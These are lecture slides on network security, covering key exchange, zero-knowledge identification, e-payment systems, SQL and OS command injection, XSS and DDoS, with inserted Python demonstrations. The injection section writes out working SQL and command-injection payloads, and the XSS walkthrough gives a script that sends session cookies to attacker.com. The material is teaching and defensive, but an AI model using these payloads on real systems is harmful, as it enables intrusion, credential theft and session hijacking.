Network Security Thay Van
http:\\soict.hust.edu.vn\~vannk
Network Security
Email: vannk@soict.hust.edu.vn
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology
Agenda
◼ Intermediate protocols: ZKP, Bit commitment and more
◼ Advanced protocols: special DSs, Blind Signatures
◼ Otway-Rees:
❑ Fixes the replay attack on Needham-Schroeder
◼ Kerberos
◼ DASS
◼ Denning-Sacco
◼ Undeniable signatures
◼ Designated confirmer signatures
◼ Proxy Signatures
◼ Group Signatures
◼ Fail-Stop Digital Signatures
◼ Zero-Knowledge Protocols
◼ Blind Signatures
DIFFIE-HELLMAN KEY EXCHANGE
What is Diffie-Hellman?
Discrete Logarithms
◼ What is a logarithm?
◼ log_10 100 = 2 because 10^2 = 100
◼ In general, if log_m b = a then m^a = b
◼ Where m is called the base of the logarithm
◼ A discrete logarithm is defined over integers only
◼ In fact we can define discrete logarithms mod p, where p is any prime number
Discrete Logarithm Problem
Sets, Groups and Fields
Groups
◼ A group is a set G with a binary operation + such that:
❑ G is closed under +, i.e., for a, b ∈ G: a + b ∈ G
❑ The associative law holds, i.e., for any a, b, c ∈ G: a + (b + c) = (a + b) + c
❑ There exists an identity element 0 such that a + 0 = a
❑ For each a ∈ G there exists an inverse element –a such that a + (–a) = 0
◼ If for all a, b ∈ G: a + b = b + a, then the group is called an Abelian or commutative group
◼ If a group G has a finite number of elements it is called a finite group
More About Group Operations
Fields
Powers of a primitive root modulo a prime run through every nonzero residue (2 is a primitive root of 11; 2 and 3 are both primitive roots of 19):

m           1  2  3  4  5  6  7  8  9 10
2^m mod 11  2  4  8  5 10  9  7  3  6  1

m           1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18
2^m mod 19  2  4  8 16 13  7 14  9 18 17 15 11  3  6 12  5 10  1
3^m mod 19  3  9  8  5 15  7  2  6 18 16 10 11 14  4 12 17 13  1
Primitive Roots
◼ If a^n = x then a is called the n-th root of x
◼ For any prime number p, if we have a number a such that the powers of a mod p generate all the numbers between 1 and p–1, then a is called a primitive root of p.
◼ In group terminology, a is a generator of the multiplicative group of the finite field formed by the integers mod p
◼ Then for any integer b with 1 ≤ b ≤ p–1 and a primitive root a of the prime p, we can find a unique exponent i (0 ≤ i ≤ p–2) such that b = a^i mod p
◼ The exponent i is referred to as the discrete logarithm, or index, of b for the base a.
Diffie-Hellman Algorithm
◼ Five Parts
1. Global Public Elements
2. User A Key Generation
3. User B Key Generation
4. Generation of Secret Key by User A
5. Generation of Secret Key by User B
Global Public Elements
◼ q: a prime number
◼ α: α < q and α is a primitive root of q
◼ The global public elements are also sometimes called the domain parameters
User A Key Generation
◼ Select private XA, XA < q
◼ Calculate public YA = α^XA mod q
User B Key Generation
◼ Select private XB, XB < q
◼ Calculate public YB = α^XB mod q
Generation of Secret Key by User A
◼ K = (YB)^XA mod q
Generation of Secret Key by User B
◼ K = (YA)^XB mod q
Diffie-Hellman Key Exchange
Diffie-Hellman Example
◼ q = 97
◼ α = 5
◼ XA = 36
◼ XB = 58
◼ YA = 5^36 mod 97 = 50
◼ YB = 5^58 mod 97 = 44
◼ K = (YB)^XA mod q = 44^36 mod 97 = 75
◼ K = (YA)^XB mod q = 50^58 mod 97 = 75
Why Diffie-Hellman is Secure?
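The exchange above, as an added example (not code from the original slides): it reproduces the q = 97, α = 5 numbers and then plays the eavesdropper, who sees only YA and YB and must solve a discrete logarithm to get K. The brute-force search is the point: it costs O(q) multiplications, trivial here and infeasible for a 2048-bit q. The use of the `secrets` module for private keys and the rejection of the order-2 public values 1 and q–1 are this example's choices.

```python
"""Diffie-Hellman over Z_q* with the page's parameters (q = 97, alpha = 5), plus the
brute-force discrete-log attack an eavesdropper would have to mount. Added example;
key generation with the 'secrets' module is this example's choice."""
import secrets


def is_primitive_root(alpha: int, q: int) -> bool:
    """alpha is a primitive root of prime q iff its powers hit all q-1 nonzero residues."""
    seen, acc = set(), 1
    for _ in range(q - 1):
        acc = acc * alpha % q
        seen.add(acc)
    return len(seen) == q - 1


def valid_public(y: int, q: int) -> bool:
    """Reject 0, 1 and q-1: they have order <= 2 and would force K into {0, 1, q-1}."""
    return 1 < y < q - 1


def dh_keypair(q: int, alpha: int):
    """Private X with 1 <= X <= q-2 and public Y = alpha^X mod q."""
    while True:
        x = secrets.randbelow(q - 2) + 1
        y = pow(alpha, x, q)
        if valid_public(y, q):
            return x, y


def dh_shared(q: int, peer_public: int, x: int) -> int:
    """K = Y_peer^X mod q; both sides obtain alpha^(XA*XB) mod q."""
    if not valid_public(peer_public, q):
        raise ValueError("degenerate public value from peer")
    return pow(peer_public, x, q)


def brute_force_dlog(q: int, alpha: int, y: int):
    """Smallest x with alpha^x = y (mod q) by exhaustive search: O(q) multiplications,
    trivial for q = 97 and hopeless for a 2048-bit q, which is what DH relies on."""
    acc = 1
    for x in range(q - 1):
        if acc == y:
            return x
        acc = acc * alpha % q
    return None


def page_example():
    """Reproduce the page's numbers: returns (YA, YB, K at A, K at B)."""
    q, alpha, xa, xb = 97, 5, 36, 58
    ya, yb = pow(alpha, xa, q), pow(alpha, xb, q)
    return ya, yb, dh_shared(q, yb, xa), dh_shared(q, ya, xb)   # (50, 44, 75, 75)


def eavesdropper(q: int, alpha: int, ya: int, yb: int) -> int:
    """With only the public values, Eve must recover XA (or XB) from a discrete log."""
    return dh_shared(q, yb, brute_force_dlog(q, alpha, ya))


def random_exchange(q: int = 97, alpha: int = 5) -> bool:
    """Fresh keys each run; True when both sides end with the same K."""
    xa, ya = dh_keypair(q, alpha)
    xb, yb = dh_keypair(q, alpha)
    return dh_shared(q, yb, xa) == dh_shared(q, ya, xb)


if __name__ == "__main__":
    print("YA, YB, KA, KB =", page_example())
    print("Eve recovers K =", eavesdropper(97, 5, 50, 44))
```

Note that nothing here stops an active attacker: Eve can run two separate exchanges with A and B (man in the middle), which is why deployed protocols authenticate the public values.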
Fiat-Shamir Identification
Setup: n = pq with p, q secret primes; A's secret is s (coprime to n) and A's public value is v = s^2 mod n.
Protocol messages:
A → B: x = r^2 mod n, for a random r
B → A: e from {0, 1}
A → B: y = r·s^e mod n
B checks that x ≠ 0 and y^2 = x·v^e mod n. The round is repeated t times; a prover who does not know s passes each round with probability 1/2.
◼ If e = 0, then the response y = r is independent of the secret s
◼ If e = 1, then information pairs (x, y) can be simulated by choosing y randomly and setting x = y^2 / v mod n
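The three-message exchange and both observations above, as an added example (not code from the original slides): an honest run with the verifier's check, the simulator that builds accepting transcripts without s, and a prover without s who can only guess the challenge. The toy modulus n = 11·19 = 209 and the secret s = 7 are constructed for illustration; a real instance uses an RSA-sized n.

```python
"""Fiat-Shamir identification: the honest exchange, the verifier's check, the
simulator behind the zero-knowledge claims above, and a prover who lacks s and
must guess the challenge. Added example; the toy modulus n = 11 * 19 = 209 and
secret s = 7 are constructed for illustration (real n is a large RSA modulus)."""
import secrets
from math import gcd
from typing import Optional, Tuple


def random_unit(n: int) -> int:
    """Random r in [2, n-2] with gcd(r, n) = 1."""
    while True:
        r = secrets.randbelow(n - 3) + 2
        if gcd(r, n) == 1:
            return r


def keygen(p: int, q: int, s: Optional[int] = None) -> Tuple[int, int, int]:
    """n = p*q; secret s coprime to n; public v = s^2 mod n. Returns (n, s, v)."""
    n = p * q
    s = random_unit(n) if s is None else s
    if gcd(s, n) != 1:
        raise ValueError("s must be coprime to n")
    return n, s, s * s % n


def commit(n: int, r: Optional[int] = None) -> Tuple[int, int]:
    """Prover's first message x = r^2 mod n; r is kept for the response."""
    r = random_unit(n) if r is None else r
    return r, r * r % n


def respond(n: int, s: int, r: int, e: int) -> int:
    """Prover's answer y = r * s^e mod n (y = r when e = 0, y = r*s when e = 1)."""
    return r * pow(s, e, n) % n


def verify(n: int, v: int, x: int, e: int, y: int) -> bool:
    """Verifier accepts iff x != 0 and y^2 = x * v^e (mod n)."""
    return x != 0 and y * y % n == x * pow(v, e, n) % n


def honest_run(n: int, s: int, v: int, rounds: int = 20) -> bool:
    for _ in range(rounds):
        r, x = commit(n)
        e = secrets.randbelow(2)
        if not verify(n, v, x, e, respond(n, s, r, e)):
            return False
    return True


def simulate(n: int, v: int, e: int, y: Optional[int] = None) -> Tuple[int, int, int]:
    """Zero-knowledge: with no s at all, build an accepting (x, e, y) by choosing y
    first and setting x = y^2 * v^(-e) mod n. Such transcripts are distributed
    exactly like real ones, so a transcript reveals nothing about s."""
    y = random_unit(n) if y is None else y
    x = y * y * pow(v, -e, n) % n
    return x, e, y


def cheating_prover(n: int, v: int, guess: int, actual_e: int) -> bool:
    """Prover without s commits as if the challenge will be `guess`; the verifier's
    real challenge is actual_e. Succeeds iff guess == actual_e: 1/2 per round."""
    x, _, y = simulate(n, v, guess)
    return verify(n, v, x, actual_e, y)


def cheat_success_probability(rounds: int) -> float:
    """Why the round is repeated: t rounds leave a cheater a 2^-t chance."""
    return 0.5 ** rounds
```

The `x != 0` check matters: a prover sending x = 0 and y = 0 would otherwise pass for either challenge.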
Bit Commitments and Zero-Knowledge
◼ Peggy the prover would like to show Vic the verifier that an element b is a member of the subgroup of Z_n* generated by α, where α has order l (i.e., does α^k = b for some k such that 0 ≤ k ≤ l – 1?)
◼ Peggy chooses a random j, 0 ≤ j ≤ l – 1, and sends Vic α^j.
◼ Vic chooses a random i = 0 or 1, and sends it to Peggy.
◼ Peggy computes j + ik mod l, and sends it to Vic.
◼ Vic checks that α^(j + ik) = α^j · α^(ik) = α^j · b^i.
◼ They then repeat the above steps log2 n times.
◼ If Vic's final computation checks out in each round, he accepts the proof.
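The protocol above as an added example (not code from the original slides), with the soundness side made explicit: a prover without k can prepare for one value of i but not both, so each round catches her with probability 1/2. The instance n = 23, α = 2 (which has order l = 11 mod 23) and the witness k = 7 are constructed for illustration.

```python
"""The discrete-log membership proof above as code: Peggy proves she knows k with
alpha^k = b (mod n) without revealing k, and a prover without k is caught with
probability 1/2 per round. Added example; n = 23, alpha = 2 (order l = 11) and the
witness k = 7 are constructed (a real instance uses a large n)."""
import math
import secrets
from typing import Optional, Tuple


def element_order(alpha: int, n: int) -> int:
    """Smallest l >= 1 with alpha^l = 1 (mod n)."""
    acc, l = alpha % n, 1
    while acc != 1:
        acc, l = acc * alpha % n, l + 1
    return l


def rounds_needed(n: int) -> int:
    """The page repeats log2(n) times; round up so a cheater's chance is at most 1/n."""
    return math.ceil(math.log2(n))


def peggy_commit(n: int, alpha: int, l: int, j: Optional[int] = None) -> Tuple[int, int]:
    """Random j in [0, l-1]; send alpha^j. Returns (j, alpha^j mod n)."""
    j = secrets.randbelow(l) if j is None else j
    return j, pow(alpha, j, n)


def peggy_respond(l: int, j: int, i: int, k: int) -> int:
    """z = j + i*k mod l: with i = 0 it is just j, with i = 1 it is k masked by j."""
    return (j + i * k) % l


def vic_check(n: int, alpha: int, b: int, commitment: int, i: int, z: int) -> bool:
    """alpha^z must equal alpha^j * b^i (mod n)."""
    return pow(alpha, z, n) == commitment * pow(b, i, n) % n


def prove(n: int, alpha: int, b: int, k: int, rounds: Optional[int] = None) -> bool:
    """Full interactive run; True iff every round's check passes."""
    l = element_order(alpha, n)
    rounds = rounds_needed(n) if rounds is None else rounds
    for _ in range(rounds):
        j, c = peggy_commit(n, alpha, l)
        i = secrets.randbelow(2)
        if not vic_check(n, alpha, b, c, i, peggy_respond(l, j, i, k)):
            return False
    return True


def cheat_round(n: int, alpha: int, b: int, l: int, guess: int, actual_i: int) -> bool:
    """Without k: pick z first and commit alpha^z * b^(-guess); the check passes
    iff the real challenge equals the guess, so each round is a coin flip."""
    z = secrets.randbelow(l)
    c = pow(alpha, z, n) * pow(pow(b, -1, n), guess, n) % n
    return vic_check(n, alpha, b, c, actual_i, z)
```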
Complexity Theory
◼ A zero-knowledge proof is
only as good as the secret
it is trying to conceal
◼ Zero-knowledge proofs of
identities in particular are
problematic
◼ The Grandmaster Problem
◼ The Mafia Problem
◼ etc.
Network Security
Van K Nguyen - HUT
◼ In some cases, e.g. for low-cost services, delivery can be made before
the actual payment authorization/transaction
Information Security by Van K Nguyen
Sep 2010 Hanoi University of Technology
Off-line vs. On-line
◼ Off-line systems: no current connections from the customer/merchant to their respective banks
❑ M can't get C authorized by the issuer's bank
❑ Also, it is difficult to prevent C from spending more money than C actually possesses
➔ most proposed Internet payment systems are online.
◼ Online systems:
❑ Require the online presence of an authorization server, which can be part of the issuer or the acquirer bank.
❑ Require more communication, but are more secure than off-line systems
◼ However, off-line is still possible, e.g. in some e-cash systems
❑ using some special strong cryptographic tools
◼ Most popular
❑ The first credit cards were introduced decades ago (Diners Club in 1949, American Express in 1958)
◼ Material
❑ For a long time, most were magnetic-stripe cards containing unencrypted, read-only information
❑ Now, many are smart cards containing hardware devices (chips) offering encryption and far greater storage capacity
❑ Recently even virtual credit cards (software electronic wallets), such as the one by Trintech Cable & Wireless
(6) Settlement:
❑ A sends a settlement request to I; I places the money into an interbank settlement account and charges the amount of sale to C's credit card account.
(7) Notification
❑ At regular intervals (e.g., monthly) I notifies C of the transactions and their accumulated charge
❑ C pays the charges by some other means (e.g., direct debit order, bank transfer, check).
(5b) A has obtained the amount of sale from the interbank settlement account and credited M's account
(4) Settlement: The issuer and the acquirer banks arrange transferring the amount of sale from C's account to M's account.
(5) Shipping/delivery
◼ On-line
❑ Users do not personally hold the e-coins
❑ A trusted third party such as an online bank holds customers' cash accounts
◼ Off-line
❑ Users can keep e-coins in smartcards or software wallets
❑ Preventing fraud and double spending requires tamper-proof devices or special cryptographic techniques
Advantages vs. Disadvantages
◼ Advantages of e-cash
❑ More efficient
❑ Lower transaction costs
❑ Available to anyone, unlike credit cards (which require special authorization)
◼ Disadvantages
❑ No tax trail
❑ Money laundering, blackmail
❑ Susceptible to forgery
5. You spend it
◼ Checkfree
❑ Allows payment with online electronic checks
◼ Clickshare
❑ Designed for magazine and newspaper publishers
❑ Miscast as a micropayment-only system; that is only one of its features
❑ Purchases are billed to the user's ISP, which in turn bills the customer
◼ CyberCash
❑ Combines features from cash and checks
❑ Offers credit card, micropayment, and check payment services
❑ Connects merchants directly with credit card processors to provide authorizations for transactions in real time
◼ No processing delays; prevents transactions with insufficient e-cash
◼ CyberCoins
❑ Stored in the CyberCash wallet, a software storage mechanism located on the customer's computer
❑ Used to make purchases between 25¢ and $10
❑ PayNow -- payments made directly from checking accounts
◼ DigiCash
❑ Trailblazer in e-cash
❑ Allowed customers to purchase goods and services using anonymous electronic cash
◼ Coin.Net
❑ Electronic tokens stored on a customer's computer are used to make purchases
❑ Works by installing a special plug-in into the customer's web browser
❑ Merchants do not need special software to accept eCoins.
❑ The eCoin server prevents double-spending and traces transactions, but the consumer is anonymous to the merchant
Micropayments
◼ Replacement of e-cash
❑ Cheaper
◼ inexpensive to handle
❑ Recycling faster
❑ Easier to count, audit, verify
◼ Low transaction value, low cost for the transaction process
❑ e.g. less than $1
◼ Best suited to small transactions
❑ Beverages
❑ Phone calls
❑ Tolls, transportation, parking
❑ Copying
❑ Internet content
❑ Lotteries, gambling
Broker
◼ Assumptions
❑ User-Broker relationship is long-term
❑ Vendor-Broker relationship is long-term
❑ User-Vendor relationship is short-term
Hash chain of coins: W_N → W_(N-1) → W_(N-2) → … → W_1 → W_0
W_(N-1) = H(W_N), W_(N-2) = H(W_(N-1)), …, W_1 = H(W_2), W_0 = H(W_1)
[Figure: new coins; spending of coins; transfer of information between customer and vendor. Source: Sherif]
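The hash chain above as an added example (not code from the original slides), in the PayWord style: the customer draws a random W_N, hashes down to the root W_0, commits W_0 to the vendor, and pays coin i by revealing W_i; the vendor verifies each payment with a few hashes and no signatures, and rejects replays, out-of-order coins and forgeries. The broker's certification of the root is stood in for by an HMAC under a hypothetical shared broker key.

```python
"""PayWord-style hash-chain micropayments, as sketched above: the customer draws a
random W_N, derives W_{i-1} = H(W_i) down to the root W_0, commits W_0 to the vendor,
and pays coin i by revealing W_i. Added example; the broker's signature on the
commitment is stood in for by an HMAC under a hypothetical shared broker key."""
import hashlib
import hmac
import secrets
from typing import List, Optional


def H(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


def make_chain(n: int, seed: Optional[bytes] = None) -> List[bytes]:
    """Return [W_0, W_1, ..., W_N]; W_N is the secret seed, W_0 the public root."""
    w = [b""] * (n + 1)
    w[n] = seed if seed is not None else secrets.token_bytes(32)
    for i in range(n - 1, -1, -1):
        w[i] = H(w[i + 1])
    return w


def commitment(broker_key: bytes, customer: str, w0: bytes, n: int) -> dict:
    """What the customer hands the vendor: (customer, root, N) plus the broker's MAC,
    which in PayWord would be the broker-certified signature on the root."""
    msg = customer.encode() + w0 + n.to_bytes(4, "big")
    return {"customer": customer, "w0": w0, "n": n,
            "mac": hmac.new(broker_key, msg, hashlib.sha256).digest()}


class Vendor:
    """Tracks the last coin seen; verifying coin i costs i - last hashes, no signatures."""

    def __init__(self, broker_key: bytes, com: dict):
        msg = com["customer"].encode() + com["w0"] + com["n"].to_bytes(4, "big")
        expected = hmac.new(broker_key, msg, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, com["mac"]):
            raise ValueError("commitment not certified by broker")
        self.n = com["n"]
        self.last_w, self.last_i = com["w0"], 0

    def accept(self, w: bytes, i: int) -> bool:
        """Accept W_i as payment of (i - last_i) coins iff H^(i-last_i)(W_i) == W_last."""
        if i <= self.last_i or i > self.n:
            return False            # replayed, out-of-order, or beyond the chain
        x = w
        for _ in range(i - self.last_i):
            x = H(x)
        if x != self.last_w:
            return False            # forged coin: does not hash back to the known value
        self.last_w, self.last_i = w, i
        return True

    def coins_received(self) -> int:
        return self.last_i
```

Because H is one-way, knowing W_0 … W_i gives the vendor nothing towards W_(i+1); the vendor can only ever claim coins the customer actually released.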
❑ Banking (Citibank)
❑ Auctions (eBay)
❑ Gambling
Attacking Authentication
◼ Authentication Technologies
❑ HTML-forms
❑ Multi-factor mechanisms (e.g. passwords and
physical tokens)
❑ Client SSL certificates and smartcards
❑ Windows-integrated authentication
❑ Kerberos
❑ Authentication services
Session Management
◼ “Static Tokens”
❑ Same token reissued to user every time
◼ A poorly implemented “remember me” feature
◼ Hacking steps:
❑ Supply unexpected syntax to cause problems
❑ Identify any anomalies in the application response
❑ Examine any error messages
❑ Systematically modify input that causes
anomalous behavior to form and verify
hypotheses on the behavior of the system
❑ Try safe commands to prove existence of injection
flaw
❑ Exploit the flaw
Code Injection Into SQL
◼ Gain knowledge of SQL
❑ Install the same database as used by the application on a local server to test SQL commands
❑ Consult manuals on error messages
◼ Detection:
❑ Cause an error condition:
◼ String Data
❑ Submit a single quotation mark
❑ Submit two single quotation marks
❑ Use SQL concatenation characters
▪ '||'FOO (Oracle)
▪ '+'FOO (MS-SQL)
▪ ' 'FOO (note the space between the quotation marks) (MySQL)
◼ Numeric Data
❑ Replace the numeric value with arithmetic (instead of 5, submit 2+3)
❑ Use SQL-specific functions
▪ 67-ASCII('A') is equivalent to 2 in SQL (ASCII('A') = 65)
❑ Beware of the special meaning of characters in HTTP such as '&', '=', '+', ... (URL-encode them)
Detection
◼ Cause an error condition:
❑ Select / Insert Statements
◼ The entry point is usually the 'where' clause, but 'order by' etc. might also be injected
◼ Example: admin' or 1=1--
❑ Example injections into the user name field for injection into an insert, where we do not know the number of parameters:
◼ foo')--
◼ foo', 1)--
◼ foo', 1, 1)--
◼ foo', 1, 1, 1)--
❑ Here we rely on 1 being cast into a string.
Union operator
◼ Usual:
SELECT author, title, year FROM books WHERE publisher = 'Wiley'
◼ Inject
' group by users.ID having 1=1--
❑ Generates error message
◼ Microsoft OLE DB Provider for ODBC Drivers error '80040e14' (Microsoft) [ODBC SQL Server Driver] [SQL Server] Column 'users.username' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause
MS-SQL: Exploiting ODBC Error Messages
◼ Inject
◼ ' group by users.ID, users.username, users.password, users.privs having 1=1--
❑ Generates no error message (every column of the table has now been named)
❑ Now proceed by injecting union statements to find the data type of each column
❑ Inject
◼ ' union select sum(username) from users--
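The probes from the last three slides, run as an added example (not code from the original slides) against an in-memory SQLite database: the string-built queries that are vulnerable beside their parameterised fixes, the single-quote versus double-quote detection probe, the `admin' or 1=1--` login bypass and a UNION that pulls the users table out through the books query. The schema, rows and credentials are constructed for illustration, and the error text is SQLite's, not the ODBC message quoted above.

```python
"""The SQL injection probes from the slides, run against an in-memory SQLite
database: the string-built (vulnerable) queries beside their parameterised fixes.
Added example; the schema, rows and credentials are constructed for illustration
and the error text is SQLite's, not the ODBC message quoted on the page."""
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, privs TEXT);
        INSERT INTO users(username, password, privs) VALUES
            ('admin', 's3cret', 'admin'), ('alice', 'wonder', 'user');
        CREATE TABLE books(author TEXT, title TEXT, year INTEGER, publisher TEXT);
        INSERT INTO books VALUES
            ('Stuttard', 'Web App Hacking', 2007, 'Wiley'),
            ('Stallings', 'Cryptography', 2006, 'Pearson');
    """)
    return db


# --- vulnerable: user input pasted into the SQL text ---------------------------
def login_vulnerable(db, username, password):
    sql = f"SELECT username FROM users WHERE username='{username}' AND password='{password}'"
    return [row[0] for row in db.execute(sql)]


def books_vulnerable(db, publisher):
    sql = f"SELECT author, title, year FROM books WHERE publisher = '{publisher}'"
    return db.execute(sql).fetchall()


# --- fixed: placeholders; the driver never lets data become SQL syntax ---------
def login_safe(db, username, password):
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in db.execute(sql, (username, password))]


def books_safe(db, publisher):
    sql = "SELECT author, title, year FROM books WHERE publisher = ?"
    return db.execute(sql, (publisher,)).fetchall()


def probe(fn, db, payload) -> str:
    """Detection step from the slides: does the payload trigger a database error?
    One quote breaks the string literal in vulnerable code; two quotes ('') form a
    valid escaped quote, so the query runs and simply matches nothing."""
    try:
        fn(db, payload)
        return "ok"
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"


BYPASS_PAYLOAD = "admin' or 1=1--"
UNION_PAYLOAD = "' UNION SELECT username, password, privs FROM users--"
```

The UNION payload works because it matches the three columns of the original SELECT; that is the column-count guessing the slides describe with `foo', 1)--`, `foo', 1, 1)--` and so on.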
By-passing filters
◼ Two types:
❑ The characters ; | & and newline are used to batch multiple commands
❑ The backtick character ` is used to encapsulate separate commands within a data item
◼ Use time delays
❑ Use 'ping' to the loop-back device
◼ || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
❑ works for both Windows and Linux in the absence of filtering
OS Injection
◼ Dynamic execution in PHP
❑ uses eval
◼ Dynamic execution in ASP
❑ uses Evaluate
◼ Hacking steps to find an injection attack:
❑ Try
◼ ;echo%201111111
◼ echo%201111111
◼ response.write%201111111
◼ :response.write%201111111
❑ Look for a return of 1111111 or an error message
Other Injection Attacks
◼ SOAP injection
◼ XPath injection
◼ SMTP injection
◼ LDAP injection
Attacking other users: XSS
◼ XSS attacks
❑ The vulnerability has a wide range of consequences, from pretty harmless to complete loss of ownership of a website
ATTACKING OTHER USERS: CROSS-SITE SCRIPTING (XSS)
[Figure: reflected XSS flow: the attacker feeds a crafted URL to the user; the user requests the attacker's URL; the server responds with the attacker's JavaScript; the user's browser sends the session token to the attacker]
Reflected XSS
◼ Exploit:
1. User logs on as normal and obtains a session cookie
2. Attacker feeds a URL to the user
◼ https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=new+Image;+i.src="http://attacker.com/"%2bdocument.cookie;</script>
3. The user requests from the application the URL fed to them by the attacker
4. The server responds to the user's request; the answer contains the JavaScript
5. The user's browser receives and executes the JavaScript
◼ var i = new Image; i.src="http://attacker.com/"+document.cookie
6. The code causes the user's browser to make a request to attacker.com which contains the current session token
7. The attacker monitors requests to attacker.com and captures the token in order to be able to perform arbitrary actions as the user
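The seven steps above as an added example (not code from the original slides): the server-side rendering of error.php that reflects the `message` parameter raw, the same page with HTML encoding applied, and the attacker-side parsing of the request that carries the leaked cookie. The URL is the one quoted above; the error page template, the attacker's log line and the session cookie value are constructed for illustration.

```python
"""Reflected XSS as in the error.php example: the server-side echo that reflects
the parameter raw beside the escaped version, and the attacker-side parsing of the
leaked cookie. Added example; the page URL is the one quoted above, the error
page template, request line and session cookie are constructed."""
import html
from urllib.parse import urlsplit, unquote_plus

ATTACK_URL = ("https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=new+Image;"
              "+i.src=\"http://attacker.com/\"%2bdocument.cookie;</script>")


def message_param(url: str) -> str:
    """Decode the 'message' query parameter as the server would ('+' -> space, %2b -> '+')."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "message":
            return unquote_plus(value)
    return ""


def render_error_vulnerable(message: str) -> str:
    """echo $_GET['message'] with no encoding: markup in the parameter becomes markup."""
    return f"<html><body><p>Error: {message}</p></body></html>"


def render_error_safe(message: str) -> str:
    """HTML-encode before placing untrusted text in element content."""
    return f"<html><body><p>Error: {html.escape(message, quote=True)}</p></body></html>"


def contains_active_script(page: str) -> bool:
    return "<script" in page.lower()


def cookie_from_request_line(request_line: str) -> dict:
    """Attacker's side: 'GET /PHPSESSID=abc123 HTTP/1.1' -> {'PHPSESSID': 'abc123'}."""
    path = request_line.split()[1]
    leaked = unquote_plus(path.lstrip("/"))
    return dict(kv.split("=", 1) for kv in leaked.split("; ") if "=" in kv)
```

Encoding on output is the fix for this element-content context; a parameter reflected into an attribute, a URL or a script block needs the encoding appropriate to that context instead.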
Sep 2009
Denial-Of-Service
◼ Flooding-based
◼ Send packets to victims to exhaust
❑ Network resources
❑ System resources
◼ Traditional DoS
❑ One attacker
◼ Distributed DoS
❑ Many attackers
DDoS
Attacks Reported
◼ May/June 1998
❑ First primitive DDoS tools developed in the underground:
◼ Small networks, only mildly worse than coordinated point-to-point DoS attacks.
◼ August 17, 1999
❑ Attack on the University of Minnesota reported to UW network operations and security teams.
◼ February 2000
❑ Attack on Yahoo, eBay, Amazon.com and other popular websites.
◼ At one point, more than 12,000 attacks were observed during a three-week period.
Reference: http://staff.washington.edu/dittrich/misc/ddos/timeline.html
DDoS Attacks
Direct Attacks
◼ Examples:
❑ TCP-SYN Flooding: the last message of TCP's 3-way handshake never arrives from the source.
❑ Congesting a victim using ICMP messages, RST packets or UDP packets.
❑ Attack packets observed: TCP packets (94%), UDP packets (2%) and ICMP packets (2%).
Direct Attack
Figure 1.
Reflector Attacks
◼ Examples:
❑ Smurf Attacks: the attacker sends an ICMP echo request to a subnet-directed broadcast address with the victim's address as the source address.
❑ SYN-ACK flooding: reflectors respond with SYN-ACK packets to the victim's address.
Reflector Attack
Figure 1.
DDoS Attack Architectures
Some Reflector Attack Methods
Solutions to the DDoS Problems
◼ Inadequate, anyway.
Attack Source Traceback and Identification
Attack Detection and Filtering
◼ Effectiveness of Detection
❑ FPR (False Positive Ratio): No. of false positives / Total number of confirmed normal packets
❑ FNR (False Negative Ratio): No. of false negatives / Total number of confirmed attack packets
Attack Detection and Filtering
◼ Effectiveness of Filtering
Attack Detection and Filtering
◼ At Source Networks:
❑ One can filter packets based on address spoofing
❑ Direct attacks can be traced easily; reflector attacks are difficult
❑ Ensure all ISPs have ingress packet filtering
◼ Filter spoofed packets whose source IPs do not belong to the source network
◼ Very difficult to deploy this at all ISPs (impossible?)
An Internet Firewall
Route-Based Packet Filtering (RPF)
◼ Extends the idea of ingress packet filtering
❑ Uses distributed packet filters to examine packets based on addresses and BGP routing information.
◼ A packet is considered an attack packet if it arrives on an unexpected link.
◼ Major Drawbacks
❑ BGP messages must carry the needed source addresses ➔ overhead!
❑ Deployment is extremely demanding
◼ Once thought: filters would have to be placed in 1800 out of 10,000 ASs
◼ The number of ASs is continuously increasing.
❑ Can't work against reflected packets.
Distributed Attack Detection (DAD)
◼ The idea is to deploy multiple Distributed Detection Systems (DSs) to observe network anomalies and misuses.
❑ Anomaly detection: identifying traffic patterns that significantly deviate from normal
◼ e.g., unusual traffic intensity for specific packet types.
❑ Misuse detection: identifying traffic that matches a known attack signature.
◼ DSs exchange attack information from their local observations
❑ Stateful with respect to the DDoS attacks.
◼ It is still challenging to come up with an effective and deployable architecture
Distributed Attack Detection
DS Design Considerations
Two Hypotheses:
H0 – Null hypothesis (no attack)
H1 – Presence of a DDoS attack
Each attack alert includes a 'confidence level'
Other considerations:
• Filters should be installed only on attack interfaces in 'CONFIRMED' state
• All DSs should be connected 'always'
• Works in progress: Intrusion Detection Exchange Protocol, Intrusion Detection Message Exchange Format
SYN FLOOD DEFENSE SOLUTIONS
TCP SYN-Flooding Attack
TCP overview (recalled):
◼ pipelined:
❑ TCP congestion and flow control set the window size
◼ send & receive buffers
◼ connection-oriented:
❑ handshaking (exchange of control msgs) initializes sender and receiver state before data exchange
◼ flow controlled:
❑ sender will not overwhelm receiver
[Figure: the application writes data into the TCP send buffer through the socket "door"; segments travel to the peer's TCP receive buffer, from which the application reads data]
TCP segment structure
[Figure: 32-bit-wide TCP header: source port #, dest port #; sequence number; acknowledgement number; header length, unused bits, flags U A P R S F, receive window; checksum, urgent data pointer; options (variable length); application data (variable length). Notes: sequence and ACK numbers count bytes of data, not segments; URG and PSH are generally not used; ACK flag means the ACK # is valid; RST, SYN, FIN are connection establishment (setup, teardown) commands; receive window is the # bytes the receiver is willing to accept; Internet checksum as in UDP]
Attack Mechanism
◼ The attacker sends a flood of SYNs ➔ too many TCBs ➔ the host's memory is exhausted.
◼ To avoid this, the OS only allows a fixed maximum number of TCBs in SYN-RECEIVED
◼ If this threshold is reached, newly arriving SYNs will be rejected
TCP Connection Management
Recall: TCP sender and receiver establish a "connection" before exchanging data segments
◼ initialize TCP variables
Three way handshake:
Step 1: client host sends a TCP SYN segment to the server
❑ specifies initial seq #
❑ no data
